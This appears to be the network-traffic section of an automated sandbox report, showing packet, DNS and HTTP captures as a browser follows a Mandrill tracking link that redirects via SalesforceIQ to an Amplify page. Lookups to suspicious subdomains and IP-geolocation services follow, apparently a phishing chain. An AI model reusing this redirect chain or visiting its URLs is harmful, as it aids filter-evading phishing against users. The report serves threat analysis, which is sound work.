                                                Dec 23, 2024 15:21:33.672866106 CET44349789104.26.9.44192.168.2.5
                                                Dec 23, 2024 15:21:33.672957897 CET49789443192.168.2.5104.26.9.44
                                                Dec 23, 2024 15:21:33.672965050 CET44349789104.26.9.44192.168.2.5
                                                Dec 23, 2024 15:21:33.716600895 CET49789443192.168.2.5104.26.9.44
                                                Dec 23, 2024 15:21:33.749926090 CET44349790135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:33.750262976 CET49790443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:33.750293016 CET44349790135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:33.750652075 CET44349790135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:33.750977039 CET49790443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:33.751050949 CET44349790135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:33.751092911 CET49790443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:33.795330048 CET44349790135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:33.795579910 CET49790443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:34.089524031 CET44349789104.26.9.44192.168.2.5
                                                Dec 23, 2024 15:21:34.089667082 CET44349789104.26.9.44192.168.2.5
                                                Dec 23, 2024 15:21:34.089739084 CET49789443192.168.2.5104.26.9.44
                                                Dec 23, 2024 15:21:34.090920925 CET49789443192.168.2.5104.26.9.44
                                                Dec 23, 2024 15:21:34.090944052 CET44349789104.26.9.44192.168.2.5
                                                Dec 23, 2024 15:21:34.291234016 CET44349790135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:34.291261911 CET44349790135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:34.291330099 CET49790443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:34.291352987 CET44349790135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:34.291363001 CET44349790135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:34.291400909 CET49790443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:34.292272091 CET49790443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:34.292294025 CET44349790135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:42.786998034 CET44349746135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:42.787101030 CET44349746135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:42.787200928 CET49746443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:44.033534050 CET49746443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:44.033572912 CET44349746135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:53.543221951 CET49713443192.168.2.515.197.175.4
                                                Dec 23, 2024 15:21:53.543232918 CET4434971315.197.175.4192.168.2.5
                                                Dec 23, 2024 15:22:05.710299015 CET49868443192.168.2.5142.250.181.68
                                                Dec 23, 2024 15:22:05.710350990 CET44349868142.250.181.68192.168.2.5
                                                Dec 23, 2024 15:22:05.710434914 CET49868443192.168.2.5142.250.181.68
                                                Dec 23, 2024 15:22:05.710680008 CET49868443192.168.2.5142.250.181.68
                                                Dec 23, 2024 15:22:05.710696936 CET44349868142.250.181.68192.168.2.5
                                                Dec 23, 2024 15:22:07.395052910 CET44349868142.250.181.68192.168.2.5
                                                Dec 23, 2024 15:22:07.396116972 CET49868443192.168.2.5142.250.181.68
                                                Dec 23, 2024 15:22:07.396156073 CET44349868142.250.181.68192.168.2.5
                                                Dec 23, 2024 15:22:07.396627903 CET44349868142.250.181.68192.168.2.5
                                                Dec 23, 2024 15:22:07.400886059 CET49868443192.168.2.5142.250.181.68
                                                Dec 23, 2024 15:22:07.400979996 CET44349868142.250.181.68192.168.2.5
                                                Dec 23, 2024 15:22:07.448910952 CET49868443192.168.2.5142.250.181.68
                                                Dec 23, 2024 15:22:08.331352949 CET4434971315.197.175.4192.168.2.5
                                                Dec 23, 2024 15:22:08.331474066 CET4434971315.197.175.4192.168.2.5
                                                Dec 23, 2024 15:22:08.331538916 CET49713443192.168.2.515.197.175.4
                                                Dec 23, 2024 15:22:10.030205011 CET49713443192.168.2.515.197.175.4
                                                Dec 23, 2024 15:22:10.030240059 CET4434971315.197.175.4192.168.2.5
                                                Dec 23, 2024 15:22:17.101155996 CET44349868142.250.181.68192.168.2.5
                                                Dec 23, 2024 15:22:17.101238012 CET44349868142.250.181.68192.168.2.5
                                                Dec 23, 2024 15:22:17.101305962 CET49868443192.168.2.5142.250.181.68
                                                Dec 23, 2024 15:22:18.035774946 CET49868443192.168.2.5142.250.181.68
                                                Dec 23, 2024 15:22:18.035818100 CET44349868142.250.181.68192.168.2.5
                                                TimestampSource PortDest PortSource IPDest IP
                                                Dec 23, 2024 15:21:02.009649038 CET53563661.1.1.1192.168.2.5
                                                Dec 23, 2024 15:21:02.021259069 CET53493101.1.1.1192.168.2.5
                                                Dec 23, 2024 15:21:04.731302023 CET53550971.1.1.1192.168.2.5
                                                Dec 23, 2024 15:21:05.653889894 CET6509453192.168.2.51.1.1.1
                                                Dec 23, 2024 15:21:05.654289007 CET5524453192.168.2.51.1.1.1
                                                Dec 23, 2024 15:21:05.791537046 CET53650941.1.1.1192.168.2.5
                                                Dec 23, 2024 15:21:05.793220997 CET53552441.1.1.1192.168.2.5
                                                Dec 23, 2024 15:21:06.892887115 CET5228353192.168.2.51.1.1.1
                                                Dec 23, 2024 15:21:06.893019915 CET5691953192.168.2.51.1.1.1
                                                Dec 23, 2024 15:21:07.194612980 CET53522831.1.1.1192.168.2.5
                                                Dec 23, 2024 15:21:07.194631100 CET53569191.1.1.1192.168.2.5
                                                Dec 23, 2024 15:21:09.046540022 CET5369653192.168.2.51.1.1.1
                                                Dec 23, 2024 15:21:09.050508022 CET5948353192.168.2.51.1.1.1
                                                Dec 23, 2024 15:21:09.637492895 CET53536961.1.1.1192.168.2.5
                                                Dec 23, 2024 15:21:09.637897968 CET53594831.1.1.1192.168.2.5
                                                Dec 23, 2024 15:21:11.788510084 CET5250153192.168.2.51.1.1.1
                                                Dec 23, 2024 15:21:11.788817883 CET5694553192.168.2.51.1.1.1
                                                Dec 23, 2024 15:21:12.209187031 CET53569451.1.1.1192.168.2.5
                                                Dec 23, 2024 15:21:12.211396933 CET53525011.1.1.1192.168.2.5
                                                Dec 23, 2024 15:21:14.838673115 CET4940653192.168.2.51.1.1.1
                                                Dec 23, 2024 15:21:14.839081049 CET5889153192.168.2.51.1.1.1
                                                Dec 23, 2024 15:21:15.963304043 CET6040453192.168.2.51.1.1.1
                                                Dec 23, 2024 15:21:15.991163015 CET5945853192.168.2.51.1.1.1
                                                Dec 23, 2024 15:21:16.394526005 CET53594581.1.1.1192.168.2.5
                                                Dec 23, 2024 15:21:16.406544924 CET53588911.1.1.1192.168.2.5
                                                Dec 23, 2024 15:21:16.406621933 CET53494061.1.1.1192.168.2.5
                                                Dec 23, 2024 15:21:16.406898975 CET53604041.1.1.1192.168.2.5
                                                Dec 23, 2024 15:21:18.850946903 CET6250253192.168.2.51.1.1.1
                                                Dec 23, 2024 15:21:18.851234913 CET5705253192.168.2.51.1.1.1
                                                Dec 23, 2024 15:21:18.989485025 CET53570521.1.1.1192.168.2.5
                                                Dec 23, 2024 15:21:18.989501953 CET53625021.1.1.1192.168.2.5
                                                Dec 23, 2024 15:21:21.744867086 CET53586741.1.1.1192.168.2.5
                                                Dec 23, 2024 15:21:22.945466042 CET5036453192.168.2.51.1.1.1
                                                Dec 23, 2024 15:21:22.945600033 CET5709553192.168.2.51.1.1.1
                                                Dec 23, 2024 15:21:23.517534971 CET53503641.1.1.1192.168.2.5
                                                Dec 23, 2024 15:21:23.517613888 CET53570951.1.1.1192.168.2.5
                                                Dec 23, 2024 15:21:25.567207098 CET6071053192.168.2.51.1.1.1
                                                Dec 23, 2024 15:21:25.567392111 CET6146653192.168.2.51.1.1.1
                                                Dec 23, 2024 15:21:25.704703093 CET53607101.1.1.1192.168.2.5
                                                Dec 23, 2024 15:21:25.704745054 CET53614661.1.1.1192.168.2.5
                                                Dec 23, 2024 15:21:27.753551960 CET5742053192.168.2.51.1.1.1
                                                Dec 23, 2024 15:21:27.753849983 CET5082053192.168.2.51.1.1.1
                                                Dec 23, 2024 15:21:27.892862082 CET53574201.1.1.1192.168.2.5
                                                Dec 23, 2024 15:21:27.893383980 CET53508201.1.1.1192.168.2.5
                                                Dec 23, 2024 15:21:27.908212900 CET5816853192.168.2.51.1.1.1
                                                Dec 23, 2024 15:21:27.908359051 CET5800253192.168.2.51.1.1.1
                                                Dec 23, 2024 15:21:27.909801006 CET6247353192.168.2.51.1.1.1
                                                Dec 23, 2024 15:21:27.909938097 CET6223053192.168.2.51.1.1.1
                                                Dec 23, 2024 15:21:28.044847012 CET53581681.1.1.1192.168.2.5
                                                Dec 23, 2024 15:21:28.061479092 CET53580021.1.1.1192.168.2.5
                                                Dec 23, 2024 15:21:28.190449953 CET53624731.1.1.1192.168.2.5
                                                Dec 23, 2024 15:21:28.195954084 CET53622301.1.1.1192.168.2.5
                                                Dec 23, 2024 15:21:29.723112106 CET5456253192.168.2.51.1.1.1
                                                Dec 23, 2024 15:21:29.723397970 CET5824053192.168.2.51.1.1.1
                                                Dec 23, 2024 15:21:29.724586964 CET5632153192.168.2.51.1.1.1
                                                Dec 23, 2024 15:21:29.724728107 CET5931853192.168.2.51.1.1.1
                                                Dec 23, 2024 15:21:30.011220932 CET53545621.1.1.1192.168.2.5
                                                Dec 23, 2024 15:21:30.011240005 CET53582401.1.1.1192.168.2.5
                                                Dec 23, 2024 15:21:30.011274099 CET53593181.1.1.1192.168.2.5
                                                Dec 23, 2024 15:21:30.011287928 CET53563211.1.1.1192.168.2.5
                                                Dec 23, 2024 15:21:32.002057076 CET5105453192.168.2.51.1.1.1
                                                Dec 23, 2024 15:21:32.002295971 CET6229553192.168.2.51.1.1.1
                                                Dec 23, 2024 15:21:32.142891884 CET53510541.1.1.1192.168.2.5
                                                Dec 23, 2024 15:21:32.144035101 CET53622951.1.1.1192.168.2.5
                                                Dec 23, 2024 15:21:40.842288971 CET53625121.1.1.1192.168.2.5
                                                Dec 23, 2024 15:22:01.466301918 CET53534921.1.1.1192.168.2.5
                                                Dec 23, 2024 15:22:03.911679983 CET53548401.1.1.1192.168.2.5
                                                TimestampSource IPDest IPChecksumCodeType
                                                Dec 23, 2024 15:21:16.406615973 CET192.168.2.51.1.1.1c246(Port unreachable)Destination Unreachable
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Dec 23, 2024 15:21:05.653889894 CET192.168.2.51.1.1.10xbae7Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:05.654289007 CET192.168.2.51.1.1.10xd700Standard query (0)www.google.com65IN (0x0001)false
                                                Dec 23, 2024 15:21:06.892887115 CET192.168.2.51.1.1.10x7382Standard query (0)mandrillapp.comA (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:06.893019915 CET192.168.2.51.1.1.10x439Standard query (0)mandrillapp.com65IN (0x0001)false
                                                Dec 23, 2024 15:21:09.046540022 CET192.168.2.51.1.1.10x355cStandard query (0)app.salesforceiq.comA (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:09.050508022 CET192.168.2.51.1.1.10x579dStandard query (0)app.salesforceiq.com65IN (0x0001)false
                                                Dec 23, 2024 15:21:11.788510084 CET192.168.2.51.1.1.10x6a4fStandard query (0)main.d3qs0n0oqv3g7o.amplifyapp.comA (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:11.788817883 CET192.168.2.51.1.1.10x9dd6Standard query (0)main.d3qs0n0oqv3g7o.amplifyapp.com65IN (0x0001)false
                                                Dec 23, 2024 15:21:14.838673115 CET192.168.2.51.1.1.10x4ba6Standard query (0)6p205g.ar.yourtaskforce.comA (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:14.839081049 CET192.168.2.51.1.1.10x61a9Standard query (0)6p205g.ar.yourtaskforce.com65IN (0x0001)false
                                                Dec 23, 2024 15:21:15.963304043 CET192.168.2.51.1.1.10x2c64Standard query (0)6p205g.ar.yourtaskforce.comA (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:15.991163015 CET192.168.2.51.1.1.10xa086Standard query (0)6p205g.ar.yourtaskforce.com65IN (0x0001)false
                                                Dec 23, 2024 15:21:18.850946903 CET192.168.2.51.1.1.10x6201Standard query (0)6p205g.ar.yourtaskforce.comA (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:18.851234913 CET192.168.2.51.1.1.10xf676Standard query (0)6p205g.ar.yourtaskforce.com65IN (0x0001)false
                                                Dec 23, 2024 15:21:22.945466042 CET192.168.2.51.1.1.10x71f2Standard query (0)5mzcue1v.doc.checkiteasy.comA (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:22.945600033 CET192.168.2.51.1.1.10x9b40Standard query (0)5mzcue1v.doc.checkiteasy.com65IN (0x0001)false
                                                Dec 23, 2024 15:21:25.567207098 CET192.168.2.51.1.1.10x25deStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:25.567392111 CET192.168.2.51.1.1.10x80dbStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                Dec 23, 2024 15:21:27.753551960 CET192.168.2.51.1.1.10xef6dStandard query (0)5mzcue1v.doc.checkiteasy.comA (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:27.753849983 CET192.168.2.51.1.1.10xde9bStandard query (0)5mzcue1v.doc.checkiteasy.com65IN (0x0001)false
                                                Dec 23, 2024 15:21:27.908212900 CET192.168.2.51.1.1.10x8ca7Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:27.908359051 CET192.168.2.51.1.1.10xd622Standard query (0)api.ipify.org65IN (0x0001)false
                                                Dec 23, 2024 15:21:27.909801006 CET192.168.2.51.1.1.10x2113Standard query (0)logo.clearbit.comA (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:27.909938097 CET192.168.2.51.1.1.10x35e6Standard query (0)logo.clearbit.com65IN (0x0001)false
                                                Dec 23, 2024 15:21:29.723112106 CET192.168.2.51.1.1.10xe5b3Standard query (0)ipapi.coA (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:29.723397970 CET192.168.2.51.1.1.10x3fc1Standard query (0)ipapi.co65IN (0x0001)false
                                                Dec 23, 2024 15:21:29.724586964 CET192.168.2.51.1.1.10x529Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:29.724728107 CET192.168.2.51.1.1.10xa89Standard query (0)api.ipify.org65IN (0x0001)false
                                                Dec 23, 2024 15:21:32.002057076 CET192.168.2.51.1.1.10xa2f7Standard query (0)ipapi.coA (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:32.002295971 CET192.168.2.51.1.1.10x3d8fStandard query (0)ipapi.co65IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Dec 23, 2024 15:21:05.791537046 CET1.1.1.1192.168.2.50xbae7No error (0)www.google.com142.250.181.68A (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:05.793220997 CET1.1.1.1192.168.2.50xd700No error (0)www.google.com65IN (0x0001)false
                                                Dec 23, 2024 15:21:07.194612980 CET1.1.1.1192.168.2.50x7382No error (0)mandrillapp.com15.197.175.4A (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:07.194612980 CET1.1.1.1192.168.2.50x7382No error (0)mandrillapp.com76.223.125.47A (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:09.637492895 CET1.1.1.1192.168.2.50x355cNo error (0)app.salesforceiq.comapiq-apiv1-06027f9a-pb-48692342.us-west-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                Dec 23, 2024 15:21:09.637492895 CET1.1.1.1192.168.2.50x355cNo error (0)apiq-apiv1-06027f9a-pb-48692342.us-west-2.elb.amazonaws.com44.226.126.181A (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:09.637492895 CET1.1.1.1192.168.2.50x355cNo error (0)apiq-apiv1-06027f9a-pb-48692342.us-west-2.elb.amazonaws.com54.184.191.144A (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:09.637492895 CET1.1.1.1192.168.2.50x355cNo error (0)apiq-apiv1-06027f9a-pb-48692342.us-west-2.elb.amazonaws.com52.39.232.93A (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:09.637897968 CET1.1.1.1192.168.2.50x579dNo error (0)app.salesforceiq.comapiq-apiv1-06027f9a-pb-48692342.us-west-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                Dec 23, 2024 15:21:12.211396933 CET1.1.1.1192.168.2.50x6a4fNo error (0)main.d3qs0n0oqv3g7o.amplifyapp.com13.227.8.104A (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:12.211396933 CET1.1.1.1192.168.2.50x6a4fNo error (0)main.d3qs0n0oqv3g7o.amplifyapp.com13.227.8.36A (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:12.211396933 CET1.1.1.1192.168.2.50x6a4fNo error (0)main.d3qs0n0oqv3g7o.amplifyapp.com13.227.8.30A (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:12.211396933 CET1.1.1.1192.168.2.50x6a4fNo error (0)main.d3qs0n0oqv3g7o.amplifyapp.com13.227.8.16A (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:16.406621933 CET1.1.1.1192.168.2.50x4ba6No error (0)6p205g.ar.yourtaskforce.com135.225.111.190A (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:16.406898975 CET1.1.1.1192.168.2.50x2c64No error (0)6p205g.ar.yourtaskforce.com135.225.111.190A (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:18.989501953 CET1.1.1.1192.168.2.50x6201No error (0)6p205g.ar.yourtaskforce.com135.225.111.190A (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:23.517534971 CET1.1.1.1192.168.2.50x71f2No error (0)5mzcue1v.doc.checkiteasy.com135.225.111.190A (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:25.704703093 CET1.1.1.1192.168.2.50x25deNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:25.704703093 CET1.1.1.1192.168.2.50x25deNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:25.704745054 CET1.1.1.1192.168.2.50x80dbNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                Dec 23, 2024 15:21:27.892862082 CET1.1.1.1192.168.2.50xef6dNo error (0)5mzcue1v.doc.checkiteasy.com135.225.111.190A (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:28.044847012 CET1.1.1.1192.168.2.50x8ca7No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:28.044847012 CET1.1.1.1192.168.2.50x8ca7No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:28.044847012 CET1.1.1.1192.168.2.50x8ca7No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:28.061479092 CET1.1.1.1192.168.2.50xd622No error (0)api.ipify.org65IN (0x0001)false
                                                Dec 23, 2024 15:21:28.190449953 CET1.1.1.1192.168.2.50x2113No error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                Dec 23, 2024 15:21:28.190449953 CET1.1.1.1192.168.2.50x2113No error (0)d26p066pn2w0s0.cloudfront.net13.227.8.64A (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:28.190449953 CET1.1.1.1192.168.2.50x2113No error (0)d26p066pn2w0s0.cloudfront.net13.227.8.72A (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:28.190449953 CET1.1.1.1192.168.2.50x2113No error (0)d26p066pn2w0s0.cloudfront.net13.227.8.47A (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:28.190449953 CET1.1.1.1192.168.2.50x2113No error (0)d26p066pn2w0s0.cloudfront.net13.227.8.65A (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:28.195954084 CET1.1.1.1192.168.2.50x35e6No error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                Dec 23, 2024 15:21:30.011220932 CET1.1.1.1192.168.2.50xe5b3No error (0)ipapi.co172.67.69.226A (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:30.011220932 CET1.1.1.1192.168.2.50xe5b3No error (0)ipapi.co104.26.9.44A (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:30.011220932 CET1.1.1.1192.168.2.50xe5b3No error (0)ipapi.co104.26.8.44A (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:30.011240005 CET1.1.1.1192.168.2.50x3fc1No error (0)ipapi.co65IN (0x0001)false
                                                Dec 23, 2024 15:21:30.011274099 CET1.1.1.1192.168.2.50xa89No error (0)api.ipify.org65IN (0x0001)false
                                                Dec 23, 2024 15:21:30.011287928 CET1.1.1.1192.168.2.50x529No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:30.011287928 CET1.1.1.1192.168.2.50x529No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:30.011287928 CET1.1.1.1192.168.2.50x529No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:32.142891884 CET1.1.1.1192.168.2.50xa2f7No error (0)ipapi.co104.26.9.44A (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:32.142891884 CET1.1.1.1192.168.2.50xa2f7No error (0)ipapi.co104.26.8.44A (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:32.142891884 CET1.1.1.1192.168.2.50xa2f7No error (0)ipapi.co172.67.69.226A (IP address)IN (0x0001)false
                                                Dec 23, 2024 15:21:32.144035101 CET1.1.1.1192.168.2.50x3d8fNo error (0)ipapi.co65IN (0x0001)false
                                                • mandrillapp.com
                                                • app.salesforceiq.com
                                                • main.d3qs0n0oqv3g7o.amplifyapp.com
                                                • https:
                                                  • 6p205g.ar.yourtaskforce.com
                                                  • 5mzcue1v.doc.checkiteasy.com
                                                  • cdnjs.cloudflare.com
                                                  • api.ipify.org
                                                  • logo.clearbit.com
                                                  • ipapi.co
                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.54971415.197.175.44434372C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-23 14:21:08 UTC1309OUTGET /track/click/30363981/app.salesforceiq.com?p=eyJzIjoiQ21jNldfVTIxTkdJZi1NQzQ1SGE3SXJFTW1RIiwidiI6MSwicCI6IntcInVcIjozMDM2Mzk4MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FwcC5zYWxlc2ZvcmNlaXEuY29tXFxcL3I_dD1BRndoWmYwNjV0QlFRSnRiMVFmd1A1dC0tMHZnQkowaF9lYklFcTVLRlhTWHFVWmFpNUo4RlFTd1dycTkzR1FPbEFuczlLREd2VzRJQ2Z2eGo4WjVDSkQxUTlXdDVvME5XNWMwY0tIaXpVQWJ1YnBhT2dtS2pjVkxkaDFZWE8ybklsdFRlb2VQZ2dVTCZ0YXJnZXQ9NjMxZjQyMGVlZDEzY2EzYmNmNzdjMzI0JnVybD1odHRwczpcXFwvXFxcL21haW4uZDNxczBuMG9xdjNnN28uYW1wbGlmeWFwcC5jb21cIixcImlkXCI6XCI5ZTdkODJiNWQ0NzA0YWVhYTQ1ZjkxY2Y0ZTFmNGRiMFwiLFwidXJsX2lkc1wiOltcImY5ODQ5NWVhMjMyYTgzNjg1ODUxN2Y4ZTRiOTVjZjg4MWZlODExNmJcIl19In0 HTTP/1.1
                                                Host: mandrillapp.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Upgrade-Insecure-Requests: 1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-User: ?1
                                                Sec-Fetch-Dest: document
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-23 14:21:09 UTC758INHTTP/1.1 302 Found
                                                Date: Mon, 23 Dec 2024 14:21:08 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Server: nginx
                                                Set-Cookie: PHPSESSID=a8h7k2ec89h6sipgf46j1o9eqd; expires=Tue, 24 Dec 2024 00:21:08 GMT; Max-Age=36000; path=/; secure; HttpOnly
                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                Cache-Control: no-store, no-cache, must-revalidate
                                                Pragma: no-cache
                                                Set-Cookie: PHPSESSID=a8h7k2ec89h6sipgf46j1o9eqd; path=/; secure; HttpOnly; SameSite=Strict
                                                Location: https://app.salesforceiq.com/r?t=AFwhZf065tBQQJtb1QfwP5t--0vgBJ0h_ebIEq5KFXSXqUZai5J8FQSwWrq93GQOlAns9KDGvW4ICfvxj8Z5CJD1Q9Wt5o0NW5c0cKHizUAbubpaOgmKjcVLdh1YXO2nIltTeoePggUL&target=631f420eed13ca3bcf77c324&url=https://main.d3qs0n0oqv3g7o.amplifyapp.com
                                                2024-12-23 14:21:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.54971644.226.126.1814434372C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-23 14:21:11 UTC886OUTGET /r?t=AFwhZf065tBQQJtb1QfwP5t--0vgBJ0h_ebIEq5KFXSXqUZai5J8FQSwWrq93GQOlAns9KDGvW4ICfvxj8Z5CJD1Q9Wt5o0NW5c0cKHizUAbubpaOgmKjcVLdh1YXO2nIltTeoePggUL&target=631f420eed13ca3bcf77c324&url=https://main.d3qs0n0oqv3g7o.amplifyapp.com HTTP/1.1
                                                Host: app.salesforceiq.com
                                                Connection: keep-alive
                                                Upgrade-Insecure-Requests: 1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-User: ?1
                                                Sec-Fetch-Dest: document
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-23 14:21:11 UTC321INHTTP/1.1 307 Temporary Redirect
                                                Date: Mon, 23 Dec 2024 14:21:11 GMT
                                                Content-Length: 0
                                                Connection: close
                                                x-build-time: {{BUILD_TIME}}
                                                txnId: 125zpl91jvg76cz07im0n0qpj
                                                Access-Control-Expose-Headers: txnid
                                                Timing-Allow-Origin: *
                                                Location: https://main.d3qs0n0oqv3g7o.amplifyapp.com
                                                Server: Jetty(9.3.z-SNAPSHOT)


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.54971713.227.8.1044434372C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-23 14:21:13 UTC677OUTGET / HTTP/1.1
                                                Host: main.d3qs0n0oqv3g7o.amplifyapp.com
                                                Connection: keep-alive
                                                Upgrade-Insecure-Requests: 1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-User: ?1
                                                Sec-Fetch-Dest: document
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-23 14:21:14 UTC541INHTTP/1.1 200 OK
                                                Content-Type: text/html
                                                Content-Length: 409
                                                Connection: close
                                                Date: Sat, 21 Dec 2024 15:02:44 GMT
                                                Server: AmazonS3
                                                Accept-Ranges: bytes
                                                ETag: "8aea5da6f3c846841267ee24e59df12f"
                                                Last-Modified: Sat, 21 Dec 2024 14:33:53 GMT
                                                Cache-Control: public, max-age=0, s-maxage=31536000
